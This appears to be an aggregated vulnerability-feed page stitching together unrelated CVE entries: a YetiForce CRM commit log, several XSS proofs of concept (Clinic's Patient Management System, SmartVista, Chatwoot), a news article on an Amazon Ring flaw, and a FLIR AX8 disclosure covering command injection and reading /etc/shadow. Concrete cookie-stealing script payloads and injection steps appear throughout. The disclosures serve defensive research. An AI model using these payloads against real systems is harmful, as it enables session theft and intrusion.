Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

Permalink

Browse files

YetiForce CRM ver. 6.4.0 (#16359)

\* Added improvements in record collector

\* Integration with UaYouControl.php (#16293)

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Integration with UaYouControl.php (#16293)

\* Add external link to NoBrregEnhetsregisteret. (#16292)

\* Add external link to NoBrregEnhetsregisteret. #16292

\* Add NorthData to RecordCollectors. (#16278)

\* Add NorthData to RecordCollectors.

\* Change docs.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Fix #16311

\* Added conditions wizard for 'Update related record' workflow action

\* Add NorthData to RecordCollectors. (#16278)

\* Code improvements

\* Added improvements in record collector

\* Zefix integraion \[in progress\] (#16281)

\* Zefix integraion \[in progress\]

\* ChZefix integration.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Improved workflow action

\* Added improvements in record collector

\* Improvements in the store

\* Update RecordCollector tests

\* Code improvements

\* Improved ConfReport

\* languages/en-US/Other/RecordCollector.json

\* Improved change module type

\* Improved default dashboard in api portal

\* Fix Send PDF workflow task

\* Improved default dashboard in api

\* Fixed attachments in 'Emails to send' panel

\* lib\_roundcube 0.3.0 Roundcube Webmail 1.6.0

\* tests

\* tests

\* Update tests.yml

\* Added improvements in record collector

\* tests/setup/dependency.sh

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Code improvements

\* Update dependencies

\* Added minor improvements

\* tests

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor improvements

\* Added minor improvements

\* Added minor improvements

\* Improved import file button

\* Improved imap connection

\* Fix #16317 - list view entries count

\* Added minor code improvements

\* Improved menu items

\* Added improvements in record collector

\* Fix gantt view (#15772)

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Updated graphics in store

\* Update install translations

\* Update fonts

\* Improved OSSMail template

\* Updated graphics in store

\* Update fonts

\* tests

\* tests Validator

\* Update icons

\* Improved widgets permissions (#15613)

\* Increase scrolling speed (#15031)

\* Added tracking to media management

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor code improvements

\* tests

\* Added minor code improvements

\* Fixed #15164 (#16319)

\* Some changes in Import module (#16318)

\* Code formatting

\* Added improvements in record collector

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Update dependencies

\* Update dependencies

\* Updated \*.min and \*.map files

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Added minor improvements in Composer::install

\* Update dev dependency

\* Added dropdown button to record collectors (#16322)

\* Corrected  Record collectors table width (#16323)

\* Fixed #15183 modulesMapRelatedFields don\`t work correct for multipicklist

\* Added minor improvements in Credits

\* Fix edit view header links

\* Improved Inventory panel and PDF widget

\* Added improvements in record collector

\* Added improvements in record collector

\* Update install translations

\* #16282 Improved the handler from getting coordinates to the map

\* Added minor code improvements

\* Fixed getting reference module in inventory name field (#16329)

\* Missing icons update

\* Improved tree field type

\* Improved tests and some code

\* Fix tree field type

\* Fix scheme for tree data table

\* Improved switch users

\* Improved YetiForce CLI

\* \[PROD\](renovate) Update dependency github/super-linter to v4.9.6 (#16324)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Bump giggsey/libphonenumber-for-php from 8.12.52 to 8.12.53 (#16331)

Bumps \[giggsey/libphonenumber-for-php\](https://github.com/giggsey/libphonenumber-for-php) from 8.12.52 to 8.12.53.
- \[Release notes\](https://github.com/giggsey/libphonenumber-for-php/releases)
- \[Commits\](giggsey/libphonenumber-for-php@8.12.52...8.12.53)

---
updated-dependencies:
- dependency-name: giggsey/libphonenumber-for-php
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

\* Improved switch users

\* Improved switch users

\* Unused code has been removed

\* Fix tree field type

\* Added improvements in record collector

\* Improved integration with DAV

\* Improved conditions wizard for 'Update related record' workflow action

\* Fixed focus to search text field when click on select2 drop down in modal window

\* Added improvements in record collector

\* Added minor code improvements

\* Improved ConfReport

\* Improved .htaccess

\* Added minor code improvements

\* Improved ConfReport

\* Fix icon on tree field type and change icon management view

\* Removed unused code. "Is added" - condition in workflows (#16321)

\* Correct setting of check boxes of Inventory boolean fields depending on their values. (#16326)

\* Update Inventory.js
Now the check-boxes of Inventory boolean fields will be set correctly regarding to their content.

\* README.md (#16332)

\* Improve inventory auto fill

\* Improved getting data from smtp (#16334)

\* Fixed #13136 (#16335)

\* Improved DB structure for map table cache

\* Improved updating payment status (#16327)

\* Improved updating payment status

\* Corrected translation (#16336)

\* Removed translation (#16337)

\* A functionality has been added to unlock e-mail accounts

\* Fix #13486

\* Update dependencies

\* mbstring.func\_overload

\* Added priority to CalendarActivities and OverdueActivities dashboard … (#16276)

\* Added priority to CalendarActivities and OverdueActivities dashboard widgets

\* Added improvement

\* Hidden icon for previewing replies in comments (#16339)

\* The display of the multi email field has been improved

\* Added working time counter widget. (#16316)

\* Added working time counter widget.

\* Added translation

\* Added improvements

\* Removed varialbe

\* Corrected comment

\* Added title to buttons

\* Added type to variable

\* Removed redundant characters

\* Added working time counter widget. #16316

\* Added minor improvements

\* Improoved dashboard titles

\* Updated \*.min and \*.map files

\* Added minor improvements in languages

\* Updated translation

\* Improvements have been added to the integration with WAPRO ERP

\* Update install translations

\* Update translations

\* Update translations

\* Added improvements in record collector

\* Added improvements in record collector

\* Improved input data cleanup

\* Improved RSS

\* Improved Rss

\* Update all Yarn dependencies (2022-08-15) (#16344)

Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

\* Added improvements in record collector

\* Improvements in the mechanism of generating PDF files

\* YetiForcePDF update v0.1.40 & Update dependencies

\* Improved some config templates

\* Added minor improvements

\* Remove unnecessary code

\* .github/workflows/actions.yml

\* .github/workflows/actions.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved Db importer/updater

\* Added buttons to the Working hours counter widget (#16340)

\* Added buttons to the Working hours counter widget

\* Added translations

\* Improved widget

\* Added button lock when starting timing

\* Update translations

\* Added missing translation

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Added missing translation

\* .github/workflows/tests.yml

\* Removed Translation (#16347)

Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>

\* Update install translations

\* Added minor improvement in get actual version of PHP

\* Update install translations

\* Updated \*.min and \*.map files

\* Redundant code has been removed

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved RSS

\* Added improvements

\* Update DEV dependencies

\* Fix Completions initialization in comments widget (#16348)

\* Update fonts

\* Fixed sending files in API for PUT method

\* Update DEV dependencies

\* Improved valid of time in Business Hours (#16351)

\* Improved executing workflow when an unsupported operator is selected (#16352)

\* Improved executing workflow when an unsupported operator is selected

\* Improved getting translation (#16350)

\* Improved Importer

\* Improved working time counter widget

\* Improved api

\* Expansion of the tests

\* Expansion of the tests

\* tests

\* Update DEV dependencies

\* Improved Rss

\* tests

\* Value display secured

\* Added improvements

\* Improved index name

\* Improved validation of quantity field (#16355)

\* Improved validation of quantity field

\* Improved code

\* Add missing picklist dependencies

\* Added  validation whether at least one business day has been selected in the Business hours module (#16356)

\* Compile js

\* Moved swagger file

\* Improved swagger generating functions

\* Added minor improvements

\* Fixed issue with date format

\* Added improvements

\* Fixed a bug when selecting all users in the calendar quick edit view (#16357)

\* Improved swagger generating functions

\* Added improvements

\* Added improvements

\* Added improvements

\* Improved Address Search panel

\* Improved Emails to send panel

\* Fix action name

\* Fix description in docBlock

\* tests/Settings/ApiAddress.php

\* Compile js

\* tests/Settings/ApiAddress.php

\* tests/Settings/ApiAddress.php

\* Remove html unnecessary class

\* Fixed #14266 (#16349)

\* \[PROD\](renovate) Update debian Docker tag to v11 (#16341)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Improved anonymization

\* Added improvements

\* Update install translations

\* Improved config class

\* Added improvements

\* Improved generatedtype for some fields

\* Fixed #15631 (#16358)

\* Added improvements

\* Improved block sequence

\* 6.4.0

Co-authored-by: rembiesa <103192653+rembiesa@users.noreply.github.com>
Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>
Co-authored-by: Adrian Koń <a.kon@yetiforce.com>
Co-authored-by: bmankowski <bmankowski@gmail.com>
Co-authored-by: Arek Solek <arkadiusz\_s9887@wp.pl>
Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>
Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>
Co-authored-by: Jared Ramon Elizan <elizanjaredr@gmail.com>
Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

*   Loading branch information

CVE-2022-1340: YetiForce CRM ver. 6.4.0 (#16359) · YetiForceCompany/YetiForceCRM@2c14baa

Clinic's Patient Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via patients.php.

Permalink

Cannot retrieve contributors at this time

**Title: Clinic's Patient Management System 1.0 Stored Cross-Site Scripting****Author: HeZhenKai****Date: 07.15.2022****Vendor: https://www.sourcecodester.com/users/tips23****Software:**

https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

#Description： #The Line 10 of patients.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

#echo $patients->address;

#PoC：

    POST /pms/patients.php HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://192.168.1.19/pms/patients.php
    Cookie: _ga=GA1.1.1382961971.1655097107; PHPSESSID=cqb92r4af78v6laio9hqjs261t
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 160
    
    patient_name=1&address=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cnic=1&date_of_birth=07%2F21%2F2022&phone_number=1&gender=Male&save_Patient=

CVE-2022-36251: bug_report/XSS-1.md at main · ZhenKaiHe/bug_report

**Cross site scripting in yetiforce/yetiforce-crm**

Moderate severity GitHub Reviewed Published Aug 22, 2022 • Updated Aug 30, 2022

GHSA-rjvc-mf7r-ch7r: Cross site scripting in yetiforce/yetiforce-crm

CVE-2022-2885

In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality. This lack of access control can be leveraged to performe a cross site scripting attack.

**Incorrect Access Control and Cross Site Scripting in Jellyfin**

High severity GitHub Reviewed Published Aug 20, 2022 • Updated Aug 30, 2022

GHSA-qwp3-5fw3-5wgv: Incorrect Access Control and Cross Site Scripting in Jellyfin

Multiple reflected XSS vulnerabilities occur when handling error message of BPC SmartVista version 3.28.0 allowing an attacker to execute javascript code at client side.

An attacker sends a draft URL https://\[URL\]/svcl/pages/monitoring/printingController.xhtml?javax.faces.partial.ajax=true&javax.faces.source=mainform%3AactiveProcesses&javax.faces.partial.execute=mainform%3AactiveProcesses&javax.faces.partial.render=mainform%3AactiveProcesses&mainform%3AactiveProcesses=mainform%3AactiveProcesses&mainform%3AactiveProcesses\_pagination=true&mainform%3AactiveProcesses\_first=6"\]\]><x:script+xmlns%3ax%3d"http%3a//www.w3.org/1999/xhtml">alert(document.domain)</x%3ascript>&mainform%3AactiveProcesses\_rows=6&mainform%3AactiveProcesses\_skipChildren=true&mainform%3AactiveProcesses\_encodeFeature=true&mainform=mainform&mainform%3AactiveProcesses\_selection=&mainform%3AactiveProcesses\_scrollState=0%2C0&mainform%3Abatches\_selection=&mainform%3Abatches\_scrollState=0%2C0&mainform%3AprintEntries\_selection=&mainform%3AprintEntries\_scrollState=0%2C0&javax.faces.ViewState=0000000000000000000%3A0000000000000000000 to victim. When victim opens the URL, XSS will be triggered. In this URL, the javax.faces.ViewState parameter can be modified to have random value but having same length as value generated by application

CVE-2022-35554: Reflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)

By Deeba Ahmed
The vulnerability was discovered by Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android.…
This is a post from HackRead.com Read the original post: Critical Amazon Ring Vulnerability Could Expose Camera Recordings

****The vulnerability was discovered by Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android.****

In May 2022, **Amazon** was alerted about a high-severity security flaw in its hugely popular home security-oriented Ring app for Android. The vulnerability could allow attackers to access camera recordings from Ring and extract sensitive data.

For your information, the Ring camera app allows homeowners to monitor video recordings from the doorbells and security cameras and boasts over 10 million downloads.

The vulnerability was discovered by an Atlanta-based app security firm Checkmarx while assessing the Ring doorbell app for Android. The flaw could expose sensitive user data, including the following:

*   Address
*   Full name
*   Geolocation
*   Email address
*   Phone number

Although Amazon quickly fixed the vulnerability in the same month when it was discovered, the details of it were only shared on August 18th by Checkmarx.

According to the company’s **blog post**, it was a cross-site scripting flaw that could be exploited in an attack chain to trick victims into installing an infected app. This app could hand over the Authorization Token of the device and extract the session cookie by sending the information with the device’s hardware ID to this endpoint– “ringcom/mobile/authorize.”

The victim is tricked into installing that app, which allows the attacker to collect authentication cookies. These cookies would allow the attacker to access a user’s account without entering the password.

Resultantly, the malicious app could steal the Ring user’s private information, geolocation data, and camera recordings, including files and computer screens visible to the app’s camera. The malicious actor may also track the homeowners’ movements inside the rooms or the building.

Checkmarx researchers found multiple bugs in the Ring Android app, which could collectively allow attackers to exploit the app and its users with a malicious app or an update to an existing app running on the device.

Checkmarx reported this issue on 1 May 2022, and Amazon fixed it on 27 May in version 3.5.1.0 of the Ring Android app. Ring spokesperson Claudia Fellerman told TechCrunch that this “extremely difficult” to **exploit vulnerability** wasn’t used in real-world attacks, and customer data wasn’t exposed.

> “Based on our review, no customer information was exposed. This issue would be extremely difficult for anyone to exploit because it requires an unlikely and complex set of circumstances to execute.”
> 
> Checkmarx

1.  **ThroughTek Flaw Exposed Millions of IoT Cameras to Spying**
2.  **Leaky database exposes fake Amazon product reviews scam**
3.  **Amazon sent 1,700 audio recordings of Alexa user to a stranger**
4.  **3TB of clips from exposed home security cameras posted online**
5.  **Whitehat hacker shows how to detect hidden cameras in Airbnb, hotels**

Critical Amazon Ring Vulnerability Could Expose Camera Recordings

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS

Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.7.0.

**Title**

XSS in markdown link-maker

**Description**

While chatting with a client, both sides may use markdown. However, neither client's nor Chatwoot inner user's input is verified.

**Steps to reproduce.**

Note: this works in Safari and Firefox, not Chrome.

I will use Telegram bot.

1.  1\. Start a conversation as an attacker with Chatwoot staff using created Telegram bot.
2.  2\. Send payload [clickMe](javascript:alert(document.cookie)) as a message.
3.  3\. As a Chatwoot staff click on the link, trigger an XSS.

Also it is possible to create a malicious link as a staff (e.g. leave it in other's staff conversation in order to trigger an XSS on their side).

1.  1\. While intercepting your traffic send a message [clickMe](https://google.com) to pass frontend check.
2.  2\. In the outcoming POST request to /api/v1/accounts/2/conversations/1/messages modify the body, so it looked something like this:

    {
        "content":"[click](javascript:alert(document.cookie))",
        "private":false,
        "echo_id":"{yourId}",
        "cc_emails":"",
        "bcc_emails":""
    }
    

3.  3\. As some other staff click on the link, trigger an XSS.

I'm leaving a video PoC for both cases:

Video PoC

**Possible remediation**

Verify message content.

**Impact**

This vulnerability is capable of running an arbitrary JS code.

CVE-2022-0542: Cross-site Scripting (XSS) - DOM in chatwoot

DolphinPHP 1.5.1 is vulnerable to Cross Site Scripting (XSS) via Background - > System - > system function - > configuration management.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#xss